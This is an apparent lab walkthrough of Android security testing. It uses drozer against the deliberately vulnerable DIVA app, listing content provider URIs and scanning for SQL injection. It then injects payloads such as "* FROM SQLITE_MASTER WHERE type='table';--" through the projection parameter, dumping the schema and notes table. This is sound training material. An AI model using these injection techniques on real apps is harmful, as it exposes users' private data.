References:
Genymotion:https://www.genymotion.com/
DIVA:https://github.com/payatu/diva-androhttps://payatu.com/wp-content/uploads/2016/01/diva-beta.tar.gz
Drozer:https://labs.mwrinfosecurity.com/tools/drozer/
https://github.com/mwrlabs/drozer
Download Link:
https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer_2.4.4.deb
https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4.win32.msi
https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
Document:
https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf
1.Connect to drozer server
Start drozer server in genymotion android device.
In client PC,Set adb forward port use command “adb forward tcp:31415 tcp:31415”
Start console to drozer. “drozer console connect”
Selecting 168b152501f68e9c (Genymotion Samsung Galaxy S9 8.0.0)
.. ..:.
..o.. .r..
..a.. . ....... . ..nd
ro..idsnemesisand..pr
.otectorandroidsneme.
.,sisandprotectorandroids+.
..nemesisandprotectorandroidsn:.
.emesisandprotectorandroidsnemes..
..isandp,..,rotectorandro,..,idsnem.
.isisandp..rotectorandroid..snemisis.
,andprotectorandroidsnemisisandprotec.
.torandroidsnemesisandprotectorandroid.
.snemisisandprotectorandroidsnemesisan:
.dprotectorandroidsnemesisandprotector.
drozer Console (v2.4.3)
dz> help
drozer: Android Security Assessment Framework
Type `help COMMAND` for more information on a particular command, or `help
MODULE` for a particular module.
Commands:
cd contributors env help load permissions set unset
clean echo exit list module run shell
Miscellaneous help topics:
intents
2.Scan content uri paths.
dz> run app.package.list -f diva
jakhar.aseem.diva (Diva)
dz> run app.provider.
app.provider.columns app.provider.download app.provider.info app.provider.query app.provider.update
app.provider.delete app.provider.finduri app.provider.insert app.provider.read
dz> run app.provider.finduri jakhar.aseem.diva
Scanning jakhar.aseem.diva...
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider
content://jakhar.aseem.diva.provider.notesprovider/
content://jakhar.aseem.diva.provider.notesprovider/notes
3.Query content’s data
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes
| _id | title | note |
| 5 | Exercise | Alternate days running |
| 4 | Expense | Spent too much on home theater |
| 6 | Weekend | b333333333333r |
| 3 | holiday | Either Goa or Amsterdam |
| 2 | home | Buy toys for baby, Order dinner |
| 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
4.Scan sql inject point
Two methods will be injected,it’s projection and selection
dz> run scanner.provider.injection -a jakhar.aseem.diva
Scanning jakhar.aseem.diva...
Not Vulnerable:
content://jakhar.aseem.diva.provider.notesprovider
content://jakhar.aseem.diva.provider.notesprovider/
Injection in Projection:
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider/notes
Injection in Selection:
content://jakhar.aseem.diva.provider.notesprovider/notes/
content://jakhar.aseem.diva.provider.notesprovider/notes
5.Validate the sql inject point
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'"
unrecognized token: "') ORDER BY title" (code 1): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "'"
unrecognized token: "' FROM notes ORDER BY title" (code 1): , while compiling: SELECT ' FROM notes ORDER BY title
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--"
| type | name | tbl_name | rootpage | sql |
| table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) |
| table | notes | notes | 4 | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) |
| table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |
dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM notes;--"
| _id | title | note |
| 1 | office | 10 Meetings. 5 Calls. Lunch with CEO |
| 2 | home | Buy toys for baby, Order dinner |
| 3 | holiday | Either Goa or Amsterdam |
| 4 | Expense | Spent too much on home theater |
| 5 | Exercise | Alternate days running |
| 6 | Weekend | b333333333333r |